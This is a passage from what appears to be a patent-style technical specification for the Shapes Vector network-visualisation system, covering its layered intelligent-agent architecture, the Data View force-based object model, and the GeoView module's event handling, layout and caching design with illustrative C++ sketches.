A Shapes Vector Intelligent Agent (SVIA) or "agent" is a concrete software entity which resides in exactly one Level of exactly one Locale within the Gestalt. Agents that reside above the lowest Level of the Locale may (optionally) receive input either from a direct source, or from the Assertion Router within the Locale which has the next lowest Level Number (or both). An agent that resides at the lowest Level of the Locale may (optionally) receive input either from a direct source, or from the Assertion Router present in the entry point remote Locale (if one was specified) which has a Level Number equal to the Level defined in the entry point specification (or both).
Agents which reside below the highest Level of the Locale may (optionally) provide output either to a direct sink, or to the Assertion Router with Level Number equal to their own (or both). An agent that resides at the highest Level of the Locale may (optionally) provide output either to a direct sink, or to the Assertion Router present in the exit point remote Locale (if one was specified) which has a Level Number equal to the Level defined in the exit point specification (or both).
An agent may never receive input from the same Assertion Router to which it provides output.
FIG. 12 illustrates these concepts for a single Locale Gestalt of 4 Levels, while FIG. 13 shows a more comprehensive example.
12. Summary
The knowledge-processing elements of the Shapes Vector system incorporate a broad variety of tools and techniques, some novel and some traditional, which combine to enact a flexible and powerful paradigm for multi-abstractional reasoning. The central feature of the approach disclosed herein is the methodology of bridging broad semantic gaps (in the embodiment illustrated, from very simple observations about a computer network to high-level statements about the state of that network) by decomposition into a series of abstraction layers. This specification describes this layered architecture and also provides details about the forms of abstraction provided at the first three layers. These include epistemic logics for possibilistic reasoning (at level 2) and probabilistic reasoning (at level 3).
The key feature of the disclosed knowledge architecture that avoids difficulties of context sensitivity and ambiguity is its simple set of structuring rules. These provide strict guidelines for placement of agents within abstractional layers and limit the patterns of communication between agents (preferably prohibiting intra-level communication as well as insisting on passing through an ontology between layers).
Experience with building and using the Intelligent Agent Architecture has shown it to be highly flexible, with the incorporation of "foreign" knowledge processing tools into the Shapes Vector Gestalt proving a "simple" exercise. The architecture has also shown itself to provide great potential for approaching knowledge-based deductive solutions to complex problems, not only in the domain of computer security but also in many other domains, both related and unrelated.
The Intelligent Agent Architecture features specifically include:
• 1. An abstraction hierarchy with multiple layers separated by formal ontologies.
• 2. Three particular abstraction layers of interest are those concerned with first-order logic, possibilistic logic and probabilistic logic.
• 3. Agents located within a layer of the architecture are prohibited from interacting with agents within the same layer (i.e. no peer-to-peer communication).
• 4. Agents located within a layer of the architecture may communicate with agents located in the layer immediately below that layer (if such exists) and/or agents located in the layer immediately above the layer (if such exists).
• 5. The architecture may incorporate a Knowledge Base in which persistent information resides.
• 6. Communication between agents must always be represented in terms of the ontology sandwiched between the sender and receiver's layer. Communications must be context-free with respect to that ontology.
• 7. Agents within the architecture may operate across a time-window, ie, a temporal region of current consideration. A user may dynamically alter parameters of an agent's time-window.
• 8. Third party knowledge processing tools (agents) may be easily wrapped and inserted into the architecture. The ontologies present within the framework ensure that only relevant knowledge transfer takes place between such elements and other agents.
PART 3 DATA VIEW SPECIFICATION
1. Data View Specification
Data View is briefly discussed in Part 1 Section 3.3 of the Shapes Vector Overview, in this specification. The following is a preferred specification of its characteristics.
1.1 Universe
• a universe has a variable maximum radius and contains any number of virtual objects.
• there may be multiple universes.
• the number of universes can be dynamically adjusted using append, insert, and delete operations specified via the user (human or appropriately programmed computer).
• universes are identified by unique names, which can be either auto generated—a simple alphabetic sequence of single characters, or can be specified by the user when appending or inserting universes dynamically.
• to assist in simplifying the display, nominated universes can be temporarily hidden. However all force calculations and position updates continue to occur. Hidden universes are simply temporarily ignored by the rendering phase of the application. A universe is then not human observable.
• a universe can be represented as a two-dimensional plane (in the embodiment a circle), but it is subject to selective zoom and synthetic strobes in a similar fashion to Geo View which may provide a third dimension elevation.
• there are at least two possible starting states for a universe:
• the big bang state in which all objects are created in the centre of the universe;
• the maximum entropy state in which all objects are evenly distributed around the maximum radius of the universe.
• a universe may be rendered with a circular grid, with identifying labels placed around the perimeter. The number of labels displayed equidistantly around the perimeter can be specified statically or dynamically, meaning those labels can be fixed or move in concert with other changes.
• multiple universes are rendered vertically displaced from each other. Inter-grid separation can be dynamically changeable via a control mechanism, such as a socket to be discussed later.
• separation between grids can be specified either globally using inter-grid size or for specific grids as a distance from adjacent grids.
• different universes can have different radii, and their grids can be drawn with different grid sizes and colours.
• all initial settings for grid rendering are to be specified through the MasterTable; these include grid size, inter-grid separation, grid colour, and grid (and hence universe) radius for each universe.
• grid settings (radius, number of radii, number of rings, intergrid spacing) can be altered dynamically via the user.
• object positions are clamped to constrain them within the universe radius.
As a result of this:
When an object located at the edge of the universe experiences a repulsive force that would place it outside the universe (forces between virtual objects will be discussed later in the specification), the object is constrained to stay within the universe so that the object slides along the rim of the universe away from the source of the repulsive force. Forces that tend to draw objects away from the rim towards the interior of the universe result in typically straight-line motion towards the source of attraction.
• the user may specify which virtual objects or sets of virtual objects are in a particular universe using an object selector, and this may dynamically change using append or replace operations on existing specifications.
• if a user replaces the specification of the destination universe for objects matching a particular object selector, then the objects will move from the universe they were originally placed in as a result of this specification to the new universe. Likewise if a user appends a new destination universe specification, then all objects in existence that match the associated object selector will appear in the new universe in addition to wherever they currently appear.
• in all cases where objects are moved between or duplicated to universes, all force interactions, phantoms, interaction markers and radius of influence displays will be updated to reflect this fact.
Force interactions are updated so they only occur between objects in the same universe.
Phantoms are moved/duplicated along with the parent primary object.
Interaction markers are moved/duplicated to remain connected to the object.
Radius of influence displays are duplicated if necessary.
1.2 Objects
• an object has a set of attributes (consisting of name, value pairs) associated with it.
• an object has two sets of references to other objects with which it interacts, named its mass interaction set and charge interaction set. Events or other external mechanisms modify these two sets.
• an object can have further sets of references to other objects. These sets have names specified at run-time by events and can be used to visualise further interactions with other objects using markers (see section 1.7 in this part of the specification).
• an object can have further sets of references to other objects that are used in building aggregate objects—see section 1.3 of this part of the specification for details.
• an object stores values for mass and charge for each flavour (a term explained later in the specification) it possesses.
• an object may inhabit one or more universes, and this relationship can be displayed using markers.
1.3 Aggregate Objects
• objects can be aggregated to form a composite.
• each aggregate object has one primary (the parent or container) object, and zero or more secondary objects (the children or containees).
• aggregate objects cannot aggregate hierarchically.
• determination of container—containee relationships occurs on the basis of “contains” and “contained-in” network object attributes. These relationships are stored in a database and are always kept up to date and consistent with the latest known information. This means any new information overrides pre-existing information. For example:
• If an attribute indicates A contains B, then it must be ensured that all relationships where B is a container are removed from the database as they are no longer valid since B is now a containee. The same attribute A contains B also indicates that A can no longer be a child of another object, since it is now a container, and so all those relationships are removed from the database. Finally the relationships “A contains B” and “B is containee of A” are added to the database.
• to avoid processing overheads, the actual relationships of objects in the display are not updated to reflect the state of the relationship database until an object is re-instantiated—usually by being moved/duplicated to another universe.
• the aggregate object is treated as a single object for the purposes of force and velocity determination, interaction marker, radius of influence, and phantom displays (subject to the considerations set out below).
• when a new object comes into existence in a universe (either as result of an event being received, or as result of dynamic adjusting of destination universe specifications), it can either become a primary in a new aggregate group, or enter the universe as a secondary in a pre-existing group depending on the containment/containee relationships in force at the time.
• if a new object enters a universe as a primary in a newly created aggregate, it will attempt to determine which other objects in the universe should be adopted to become secondaries. The adoption occurs when another object (potential adoptee) is located that is a containee of the new object (according to the relationship database). When the potential adoptee is a primary in an aggregate with secondaries, the secondaries are evicted before adopting the primary. The evicted secondaries are now inserted into the universe using the insertion policy in force, and they in turn determine potential adoptees and adopt where possible as described.
• the summed masses and charges (section 1.5 in this part of the specification) of all objects within an aggregate are used for force/mass calculations.
• each individual element in an aggregate maintains its own mass, and masses of like flavour are summed when determining the mass of an aggregate.
• an aggregate object maintains and decays a single total charge for each flavour. When an object joins an aggregate its charges are added to the summed charges of like flavour for the aggregate. When an object leaves an aggregate no change is made to the summed charge as it cannot be known (because of charge decay) what proportion of the total charge is due to the object in question.
• when an object receives additional charge as result of an event, the new charge is added to the total for the aggregate containing it.
• if any object within an aggregate object displays a mass or charge radius of influence (see section 1.9 in this part of the specification), the mass/charge radius is displayed for the entire group, provided the group as an entity has a non-zero mass or charge of the flavour as specified by the radius of influence definition.
• display of phantoms (section 1.7 in this part of the specification) of aggregate objects is driven only by the primary object. The phantoms appear as duplicates of the primary object and trail the primary object's position. If an object matches a phantoming specification, but it happens to be a secondary within an aggregate object then no action is taken.
• if an object (A) within an aggregate is required to display interaction markers (see section 1.8 in this part of the specification), the interaction markers are drawn from the primary of the aggregate object containing A to the primary of the aggregate(s) containing the destination object(s).
• In addition, when interaction markers are drawn in response to picking of an object, they are drawn from the primary of the aggregate containing the picked object to all duplicates in other universes of all destination objects that are in the relationship to the source object that is being visualised by the markers.
• when interaction markers are drawn in response to the matching of an ObjectSelector, markers are drawn from all duplicates of the source aggregate object to all duplicates of the destination aggregate object(s).
• when interaction markers are used to highlight duplicates of the same object in multiple universes, a single multi-vertex marker is displayed which starts at the duplicate appearing lowest in the stack of universes and connecting all duplicates in order going up the stack and ending at the highest appearing duplicate in the stack.
1.4 Object Selector
An object selector specifies a set of objects using set expressions involving set union (+), set difference (−), and set intersection (^) operators. The intersection operator has the highest precedence, difference and union have equal lower precedence. Parentheses can be used to change operator precedence. The set operations have the following operands:
• all—set of all objects;
• class(classname)—set of objects in a given class;
• objects(predicate)—set of objects satisfying a predicate expressed in terms of boolean tests (using and, or, not) on attribute values (e.g. objects(ram >= 128000000 && type=sun)) and existence of attributes (e.g. objects(attributes(attributename, attributename, . . . ))). The "and" (&&) and "or" (||) operators have equal high precedence. The "not" operator (!) has lower precedence. Parentheses can be used to change operator precedence.
• Flavor(flavorname)—set of objects having all attributes in the given flavour's definition.
• instance(objectid)—set containing object with given object id.
Object selectors are named when defined. This name is used as a shorthand means of referring to the object selector without having to repeat its definition, for example when defining an action on the basis of an object selector.
Object Selectors can be defined via a control port, or via a start-up setting, currently stored in the ApplicationSettings part of the MasterTable file.
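By way of a hypothetical example of the set expression syntax (the class names, attribute names and instance id below are illustrative assumptions only), a selector covering all Sun computers with at least 128 MB of RAM, together with one additional object but excluding all routers, could be written as:

(class(Computer) ^ objects(ram >= 128000000 && type=sun)) + instance(4711) - class(Router)

Because intersection binds more tightly than union and difference, the parentheses around the first term are not strictly required, but they make the intended grouping explicit.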
1.5 Mass, Charge and Flavours
There exist different flavours of mass and charge.
A flavour is defined by the user as a collection of five-tuples, each defining the flavour with respect to a particular class of objects. The tuple consists of flavour name, object class (or all), an attributes expression listing attributes which must exist, a formula for mass and a formula for charge. There may be multiple such tuples with the same flavour name, which together define a flavour for multiple classes of objects. The formulae are used to calculate the amount of mass or charge of the flavour which the object possesses, and they are arithmetic expressions involving object attribute value terms. Note that it is a semantic error for the attributes expression not to include attributes which feature in the mass or charge formulae. For example:
Flavour {
Strawberry,
Computer,
Attributes [runs ram data_rate_in data_rate_out],
ram/1024,
data_rate_in + data_rate_out;
}
If the result of evaluating a mass formula is less than a small positive number (ε) then the value used for the mass in calculations should be ε.
An object may have an amount of flavoured mass or charge if there is a corresponding definition of the flavour for the class of object and the object satisfies the attributes expression for that flavour.
Charge may be set to decay (at a particular rate) or accumulate (ie. a rate of zero) on a per flavour basis. The decay function can be set to one of a fixed set (exponential, linear and cosine) on a per flavour basis.
Mass and charge may each have a radius of influence specified on a per flavour basis. Objects that fall within the respective radii of an object may generate a force on the object as a result of their mass or charge respectively, and objects that lie outside this region have no influence on the object.
The radii of influence for objects may be graphically depicted at the user's discretion. Note that multiple radii may apply due to different radii for mass and charge and for different flavours of the same.
When an event arrives that affects one of the attributes listed in a flavour definition, then the object's mass and charge are to be recalculated using the arithmetic expressions specified in said flavour definition. The newly calculated mass will replace the existing mass, and the newly calculated charge will be added to the existing charge.
In addition there are special considerations relating to mass/charge/flavour and aggregate objects. See section 1.3 in this part of the specification regarding those.
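As an illustration of the mass and charge recalculation rule (new mass replaces, new charge accumulates, with the ε clamp on mass), the following C++ sketch hard-codes the Strawberry flavour formulae from the example above. The attribute store and function names are assumptions introduced for this sketch only.

#include <algorithm>
#include <map>
#include <string>

// Illustrative sketch only: a simplified attribute store with the Strawberry
// flavour formulae hard-coded rather than parsed from the flavour definition.
using Attributes = std::map<std::string, double>;

const double kEpsilon = 1e-6;  // small positive number used to clamp mass

double strawberryMass(const Attributes& a)   { return a.at("ram") / 1024.0; }
double strawberryCharge(const Attributes& a) { return a.at("data_rate_in") + a.at("data_rate_out"); }

// Recalculate flavoured mass and charge when an event alters a listed attribute:
// the new mass replaces the old value (clamped to epsilon), and the new charge
// is added to the accumulated charge for that flavour.
void onAttributeEvent(const Attributes& obj, double& mass, double& charge) {
    mass = std::max(strawberryMass(obj), kEpsilon);
    charge += strawberryCharge(obj);
}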
1.6 Forces
There are two types of forces acting on objects in the universe, gravitational (as a result of the mass of an object) and electrostatic (as a result of the charge on an object).
The gravitational force is repulsive and the electrostatic force is attractive.
Forces are two-dimensional vectors and are additive.
The velocity of an object is proportional to the force acting on it divided by its mass (ie. acceleration is disregarded). Note that flavours need to be taken into account in this calculation.
There is a variable maximum velocity which applies to all objects in a universe.
Only masses and charges of the same flavour may produce a resultant force.
The velocity due to gravitational forces of an object is contributed by the gravitational forces which result from each of the objects in its mass interaction set (using the mass value for each relevant flavour) which are also within the radius of influence for mass. These forces are divided by the correspondingly flavoured mass of the object to arrive at velocities.
The velocity due to electrostatic forces of an object is contributed by the electrostatic forces which result from each of the objects in its charge interaction set (using the charge value for each relevant flavour) which are also within the radius of influence for charge. These forces are divided by the correspondingly flavoured mass of the object to arrive at velocities.
The net velocity of an object is the sum of the gravitational and electrostatic velocities for that object.
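The velocity rules above can be summarised in the following C++ sketch. The inverse-square falloff and the field names are assumptions made for this sketch; the specification itself fixes only that mass repels, charge attracts, only objects within the relevant interaction set and radius of influence contribute, velocities are forces divided by the flavoured mass, and the net velocity is clamped to the universe maximum.

#include <cmath>
#include <vector>

// Illustrative sketch only, working in the universe's two-dimensional plane.
struct Vec2 { double x = 0.0, y = 0.0; };

struct Body {
    Vec2   pos;
    double mass;    // flavoured mass (clamped to a small positive epsilon)
    double charge;  // flavoured charge of the same flavour
};

Vec2 netVelocity(const Body& self,
                 const std::vector<Body>& massSet,   double massRadius,
                 const std::vector<Body>& chargeSet, double chargeRadius,
                 double maxSpeed) {
    Vec2 force;
    auto addForces = [&](const std::vector<Body>& others, double radius,
                         bool attractive, bool useCharge) {
        for (const Body& o : others) {
            double dx = o.pos.x - self.pos.x, dy = o.pos.y - self.pos.y;
            double d  = std::sqrt(dx * dx + dy * dy);
            if (d == 0.0 || d > radius) continue;          // outside the radius of influence
            double strength = useCharge ? self.charge * o.charge
                                        : self.mass * o.mass;
            double f = strength / (d * d);                 // assumed inverse-square falloff
            double s = attractive ? 1.0 : -1.0;            // attraction towards, repulsion away
            force.x += s * f * dx / d;
            force.y += s * f * dy / d;
        }
    };
    addForces(massSet,   massRadius,   false, false);      // gravitational forces: repulsive
    addForces(chargeSet, chargeRadius, true,  true);       // electrostatic forces: attractive
    Vec2 v{ force.x / self.mass, force.y / self.mass };    // acceleration is disregarded
    double speed = std::sqrt(v.x * v.x + v.y * v.y);
    if (speed > maxSpeed && speed > 0.0) {                 // clamp to the universe maximum velocity
        v.x *= maxSpeed / speed;
        v.y *= maxSpeed / speed;
    }
    return v;
}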
1.7 Phantoming
When selected, objects will be able to display a history of previous positions by displaying a ‘phantom’ at a number of previous locations.
Objects for which phantoms are drawn are selected using named Object Selectors.
Display Parameters for phantoming can be set in the ApplicationSettings part of the MasterTable or via a control socket, and are associated with a previously defined Object Selector.
Display parameters include the time spacing between phantoms, the display style (eg transparent or wire frame), and the number of phantoms to show.
Multiple Object Selectors and associated display parameters can be used to display any desired combination of phantoms.
In addition there are special considerations relating to phantoming and aggregate objects—see section 1.3 in this part of the specification for those.
1.8 Markers
Interaction markers may be used to highlight interaction between weakly interacting objects.
Interaction markers make use of named Object Selectors to determine which objects have interaction markers displayed.
Interaction markers may span multiple universes.
Display parameters for markers can be set in the ApplicationSettings part of the MasterTable or via the control socket, and are associated with an interaction type.
Display parameters for markers include line style, width and colour. Each interaction type is drawn with its own independently specified line style, width, and colour.
Marker display can optionally be toggled by the user interactively picking an object on the display.
Multiple Object Selectors and associated display parameters can be used to display any desired combination of markers.
In addition there are special considerations relating to interaction markers and aggregate objects—see section 1.3 in this part of the specification for those.
1.9 Radius of Influence Display
Radius of influence can be visualised for selected objects as transparent disks.
Objects for which radius of influence are displayed are selected using the Object Selector mechanism.
Display parameters include which flavour to display the radius for, whether the charge or mass radius is to be displayed, the colour of the displayed disk, and the transparency level of the displayed disk.
Display parameters can be set in the ApplicationSettings part of the MasterTable or via the control socket, and are associated with a previously defined Object Selector.
Multiple Object Selectors and associated radius of influence display parameters can be in use simultaneously to display any desired combination of radii.
In addition there are special considerations relating to radius of influence displays and aggregate objects—see section 1.3 in this part of the specification for those.
1.10 Pulses
A flavoured pulse of charge or mass may be applied at any location within a universe, and has influence over the entire universe. That is, a flavoured pulse is applied without regard to the mass and charge radii associated with its flavour.
1.11 Irregular Functions
A user may “shake” a universe at any particular moment, by either:
• perturbing each object by a random amount (under a variable maximum)
• randomly placing each object within the universe.
A user may reproduce the start state of a universe at any particular moment, as at least either the big bang or maximum entropy state.
PART 4 GEO VIEW SPECIFICATION
1. Introduction
1.1 Identification
This document relates to the GeoView Module for the Visuals Sub-system of Shapes Vector.
1.2 System Overview
1.2.1 General
Shapes Vector is a system which, in the embodiment used to illustrate its principles and features, provides an analyst or system administrator with a dynamic real-time visualisation of a computer or telecommunications network. Shapes Vector is an advanced 3-D graphical modelling tool developed to present information about extended computer systems. Shapes Vector places users within a virtual world, enabling them to see, hear and feel the network objects within their part of this world. The objects may be computers, files, data movements or any other physical or conceptual object such as groups, connected to the system being navigated. Seeing an object with a particular representation denotes a class of object and its state of operation within its network.
Just as familiar objects make up our natural view of the physical world, so too a computer network is made up of physical objects, such as computers, printers and routers, and logical objects, such as files, directories and processes.
Shapes Vector models network objects as 3D shapes located within an infinite 3D universe. An object's visual attributes, such as colour, texture and shading, as well as its placement and interaction with other objects, provide the user with significant information about the way the real network is functioning.
1.2.2 Geo View Module Scope
GeoView, along with DataView, is one of the ways in which the user can view, and interact with, the data produced by the Agents Sub-system. Each of these views is defined by certain characteristics that allow it to provide a unique representation of the data. GeoView has an emphasis on the physical objects with a geographic perspective. This means it places a heavy importance on objects related to the physical rather than the logical world, and that these objects tend to be laid out in a traditional geographic manner.
While objects such as computers, printers and data links are of prime importance to GeoView, logical objects such as network traffic, computer processors, and user activity are also displayed because of the relationships between the physical and logical objects.
FIG. 1 shows the library dependency relationship between the GeoView module and other modules. The full relationship between the Sub-systems and between this module and other modules of this sub-system, is shown in the System/Sub-system Design Description.
1.3 Overview
This part of the specification provides a Detailed Design for the GeoView Module of the Visuals Sub-system (CSCI) of the Shapes Vector Project.
This module encompasses the following sub-components:
• Layout Hierarchy
• Layout Structure Template Library (LSTL)
The content of this part is based on the Data Item Description (DID) DI-IPSC-81435, Software Design Description (SDD), from the US Military Standard MIL-STD-498 [1], using the MIL-STD-498 Tailoring Guidebook [2] for the development project.
Detailed design information in this document is based on the technical content of other parts of this specification.
2. Referenced Documents
2.1 Standard
• [1] MIL-STD-498, Military Standard: Software Development and Documentation, US Department of Defence, 5 Dec. 1994.
• [2] MIL-STD-498 Overview and Tailoring Guidebook, 31 Jan. 1996.
3. Module-wide Design Decisions
This section presents module-wide design decisions regarding how the module will behave from a user's perspective in meeting its requirements, and other decisions affecting the selection and design of the software components that make up the module.
3.1 Design Decisions and Goals of Geo View
GeoView is designed with only one executable.
GeoView has logically divided sub-components: Layout Hierarchy and Layout Structure Template Library (LSTL).
Unless otherwise specified, the programming language used in GeoView is C++. The following list identifies the design concepts that characterise GeoView:
• 1. Physical: Due to the focus on the physical world, more importance is placed on physical objects and less importance on logical objects.
• 2. Geographic: The default mechanism for placing objects in the world is to map them according to a physical location. If this is not possible then other methods must be used.
• 3. Shape: Shape is used to identify unique objects. Different object types will have different shapes while similar object types will have similar shapes.
• 4. Motion: Movement of objects (translation, rotation) typically represents activity in the world. A moving packet represents traffic flow while a spinning process shows that it is active.
• 5. Sound: Sound is linked to movement of objects or a change in visual appearance or a change in state.
• 6. Feel: Feel or touch senses can be used to provide additional emphasis to events linked to movement of objects, where for example objects come into close proximity suddenly.
4. Module Architectural Design
At the architectural level, the sub-systems (CSCIs) are decomposed into modules. At the detailed design level, the modules are decomposed (if applicable) into executables or libraries. This section describes the module architectural design.
The major architectural decomposition of GeoView comprises the following component:
• GeoView General (Section 4.1.1 of Part 4)—contains all the classes for the support of the View, including interfaces with WorldMonitor for handling incoming events from Tardis, MasterTable for input and output of master tables, and LayoutHierarchy for handling the layout of network objects within the world.
and sub-components:
• LayoutHierarchy (Section 4.1.2 of Part 4)—responsible for the node store and data structure of GeoView. It places graphical (renderable) objects into the scene graph based on layout rules specified in the MasterTable. It uses the LSTL to manage structure nodes; and
• LSTL (Section 4.1.3 of Part 4)—responsible for placing network objects (nodes) into layout structures such as rings, stars, and lines. The LSTL is a generic library with its components being templates. The layout structures covered include:
• Tree, Graph, Line, Star, Matrix, Rectangle and Ring.
FIG. 15 shows an overview diagram for GeoView. The component/sub-components are described at an architectural level in the sections below. Detailed design of the sub-components LayoutHierarchy and LSTL is included in Section 5. GeoView uses the Layout Structure Template Library (LSTL) framework by instantiating it with the LayoutHierarchy node type.
4.1 Geo View Functional Design
4.1.1 Geo View General
This section is divided into the following architectural design sub-sections:
• Event Handling
• MasterTable Functionality
• CCI Interface
• GeoView Processing and Caching
4.1.1.1 Event Handling
The World Monitor receives events describing NetworkObjects from the Tardis process, via shared memory as shown in FIG. 15. Each recognised network object has its own event type, with event types coming in the six variants shown in Table 1.
TABLE 1
Network Object Event Handlers

Event Type Variant         Event Handler Functionality
AddObject                  Create a new NetworkObject
AddObjectAttributes        Add new attributes to an existing NetworkObject
ReplaceObject              Replace a NetworkObject completely
ReplaceObjectAttributes    Replace a NetworkObject's attributes
RemoveObject               Temporarily removes a NetworkObject (tagged for deletion, which cannot be undone)
Purge zombies              Permanently removes a NetworkObject
Currently the handlers for AddObject and AddObjectAttributes are identical, both adding an object if none exists, and merging in the associated attributes as well.
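A minimal C++ sketch of how these event variants might be dispatched is shown below. The enumeration and handler bodies are assumptions made for illustration; in particular the sketch reflects the note above that the AddObject and AddObjectAttributes handlers currently behave identically.

#include <string>

// Illustrative sketch only; the real World Monitor dispatch is not shown in this document.
enum class EventVariant {
    AddObject, AddObjectAttributes, ReplaceObject,
    ReplaceObjectAttributes, RemoveObject, PurgeZombies
};

struct NetworkObjectEvent { EventVariant variant; std::string objectId; };

void dispatch(const NetworkObjectEvent& ev) {
    switch (ev.variant) {
    case EventVariant::AddObject:               // fall through: the two handlers
    case EventVariant::AddObjectAttributes:     // currently behave identically
        /* add the object if none exists, then merge in its attributes */ break;
    case EventVariant::ReplaceObject:           /* replace the NetworkObject completely */   break;
    case EventVariant::ReplaceObjectAttributes: /* replace the NetworkObject's attributes */ break;
    case EventVariant::RemoveObject:            /* tag the NetworkObject for deletion */     break;
    case EventVariant::PurgeZombies:            /* permanently remove the NetworkObject */   break;
    }
}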
4.1.1.2 MasterTable Functionality
The MasterTable is a hierarchical repository used for mapping network object attributes to visual attributes. In operation, when a visual attribute is required, an address is constructed using the application name, the object type, and the network object. The MasterTable is queried using this address and a list of matching attributes is returned. These could include direct attribute settings, or attribute tests, where for example an object might become a particular colour if the value of a specified network attribute of the NetworkObject in question is greater than a given constant. The MasterTable also contains the Layout Rules determining what layout-structure objects are placed in.
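The following C++ sketch illustrates the address construction and query idea described above. The address format (a simple path of application, object type and object) and the container used are assumptions made for this sketch, not the actual MasterTable interface.

#include <map>
#include <string>
#include <vector>

// Illustrative sketch only: a flat map stands in for the hierarchical MasterTable.
std::string makeAddress(const std::string& application,   // e.g. "GeoView"
                        const std::string& objectType,    // e.g. "Computer"
                        const std::string& objectName) {  // the network object in question
    return application + "/" + objectType + "/" + objectName;
}

// A query returns the visual attribute settings (or attribute tests) recorded
// under the constructed address, or an empty list when nothing matches.
std::vector<std::string> queryMasterTable(
        const std::map<std::string, std::vector<std::string>>& table,
        const std::string& address) {
    auto it = table.find(address);
    return it != table.end() ? it->second : std::vector<std::string>{};
}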
4.1.1.3 CCI Interface
The Component Control Interface (CCI) consists of textual commands sent via a socket that can be used to drive various portions of the application. Each Shapes Vector process usually has one or more CCIs, with each CCI being attached to a logically distinct portion of the application. For example, GeoView has a CCI for controlling the renderer, one for the SVWorld (shown as Virtual World on FIG. 1), which currently deals mainly with selective zoom and object selectors, and one for the World Monitor that gives access to commands relating to processing of incoming events.
When a command arrives on the CCI socket, the CCI thread notifies the main thread that it wants access to the mutex. The next time the main thread checks (in SV_View::postTraverseAndRender) it will yield to the CCI thread, which then performs all necessary processing before relinquishing the lock.
The notification mechanism is embodied in a class called ControlMutex that resides in the svaux library. It allows a higher priority thread to simply check the value of a flag to see if anyone is waiting on a mutex before relinquishing it, rather than performing a costly check on the mutex itself. Currently the ControlMutex is not used in processing, rather the CCI is checked once per renderer cycle in SV_View (the base view).
FIG. 16 shows the processing within the CCI thread as part of the GeoView thread diagram.
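A simplified C++ sketch of the flag-check idea behind ControlMutex follows. It is an assumption-laden illustration of the pattern (a cheap atomic flag consulted by the higher priority thread before it touches the mutex), not the actual svaux implementation, and it ignores fairness and race subtleties.

#include <atomic>
#include <mutex>

// Illustrative sketch only.
class ControlMutexSketch {
public:
    // Lower priority (CCI) thread: announce interest, then block on the mutex.
    void requestAccess() { waiting_.store(true); mtx_.lock(); waiting_.store(false); }
    void releaseAccess() { mtx_.unlock(); }

    // Higher priority (render) thread, called once per cycle while it holds the
    // mutex: a cheap flag check avoids probing the mutex itself when nobody waits.
    void yieldIfRequested() {
        if (waiting_.load()) {
            mtx_.unlock();   // let the CCI thread run its queued commands
            mtx_.lock();     // then take the lock back for rendering
        }
    }
    void acquire() { mtx_.lock(); }

private:
    std::atomic<bool> waiting_{false};
    std::mutex        mtx_;
};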
4.1.1.4 GeoView Processing and Caching
The basic structure of processing in GeoView is for external events to arrive detailing the existence of world objects, facts known about them and their relationships to other world objects in the form of attributes. The virtual depiction of these real world objects occurs graphically via leaf nodes in the GeoView universe, where the visual attributes for each type of possible world object are specified via the MasterTable. Such visual attributes may be specified on the basis of attributes of the world objects.
In order to determine where to place these leaf nodes, the layout rules from the MasterTable are used. These layout rules specify attachment, containment and logical groupings of leaf nodes on the basis of their attributes.
To enable this, the building of the GeoView world is broken into the following five phases, with phases 2-5 referred to as the 'Layout' process:
1. Event Insertion and Removal
Attributes to add or remove arrive encapsulated within network objects via events.
New leaf nodes in the layout hierarchy are created where necessary; attributes and inversed attributes are added to, or removed from, leaf nodes.
Caching for the next four processing steps (i.e. Layout) occurs.
2. Leaf Building
Graphical objects are built according to their visual mappings in the MasterTable.
3. Layout Rule Application
Layout-structure, attached-to and located-in rules from the MasterTable are applied to the objects. Any necessary grouping layout structures are created and parent-child relationships are formed that will dictate positioning, attachment, and containment.
4. Leaf Edge Creation
New edges between leaf nodes are created.
5. Object Relative Placement
Both leaf nodes and structure nodes are placed on the basis of their hierarchical relationships (attachment and containment) in the layout hierarchy as well as their parent structure nodes.
For efficiency, each phase of processing is associated with caching certain operations such that repeat operations do not occur. The GV_WorldMonitor turns off the layout flag before the insertion of a batch of events into the root of the GeoView layout hierarchy. After a batch of events has been inserted, the layout flag is turned back on, and the entire batch is processed fully. This procedure represents the start point for caching optimisation in the layout hierarchy.
If such a caching strategy were not employed, processing time may be greatly affected. This is due to relative placement using bounds information. For example, consider Computer A with 20 child modems, each of them attached-to it. As the sub-structure for attached-to objects (for example a ring) is called for EACH of the child modems, a bounds radius change will occur. Since this may affect the overall composite structure's bounds radius (i.e. the parent Computer A's bounds), the relative placement algorithm must be called for Computer A's parent structure. This occurs in a recursive manner up to the root layout structure. Without caching, the relative placement of Computer A would need to occur a minimum of 20 times. By caching the fact that Computer A requires placement (on level base-2 of the layout hierarchy tree) it can be guaranteed that Computer A's relative placement is called a maximum of once only.
Table 2 provides an overview of which operations are cached and at what stage of processing this occurs.

TABLE 2

Level    Processing                           Caching
1        Object insertion and removal         Each leaf node created or altered
2        Object building and layout           Each structure node requiring placement
3        Edge creation                        Leaf nodes requiring edge updates
4        Base level structure placement       Base Level-1 structure placement, leaf nodes requiring edge updates
5        Base Level-1 structure placement     Base Level-2 structure placement, leaf nodes requiring edge updates
...      ...                                  ...
N        Top Level Structure placement        Leaf nodes requiring edge updates
N + 1    Leaf nodes requiring edge updates    ...
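The caching scheme in Table 2 can be sketched as follows in C++. The node type, its members and the container layout are assumptions made for illustration; the essential point is that structures needing placement are cached per level and processed from the deepest level upwards, so each structure's relative placement is invoked at most once per batch.

#include <iterator>
#include <map>
#include <set>
#include <utility>

// Illustrative sketch only; not the actual LayoutHierarchy classes.
struct StructureNode {
    int            level;    // depth in the layout hierarchy (root = 0)
    StructureNode* parent;   // nullptr at the root
    void relativePlacement() { /* place children according to this structure's shape */ }
};

void processPlacementCache(std::map<int, std::set<StructureNode*>>& cache) {
    while (!cache.empty()) {
        auto deepest = std::prev(cache.end());             // largest level number first
        std::set<StructureNode*> nodes = std::move(deepest->second);
        cache.erase(deepest);
        for (StructureNode* n : nodes) {
            n->relativePlacement();                        // called at most once per node
            if (n->parent)                                 // bounds may have changed, so queue
                cache[n->parent->level].insert(n->parent); // the parent for placement next
        }
    }
}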
4.1.2 LayoutHierarchy
The LayoutHierarchy is the view specific node store and system of data structures that implement GeoView. It consists of a hierarchy of classes that combine to form a logical object hierarchy of graphical and grouping objects that parallel the structure of the Scene Graph.
4.1.2.1 Class Hierarchy
The class relationship diagram for Layout Class Hierarchy is shown in FIG. 17
The Layout Hierarchy data structure is a hierarchical, arbitrarily depthed tree. Nodes represent either logical grouping constructs (i.e. LH_SNodes, LH_CoordGroupSet or LH_CoordGroups) or graphical objects in the GeoView universe (i.e. LH_Leaf).
All classes inherit from the abstract base class LH_Node. The LH_Root, LH_EdgeSet and LH_CoordGroupSet classes each represent singleton instances.
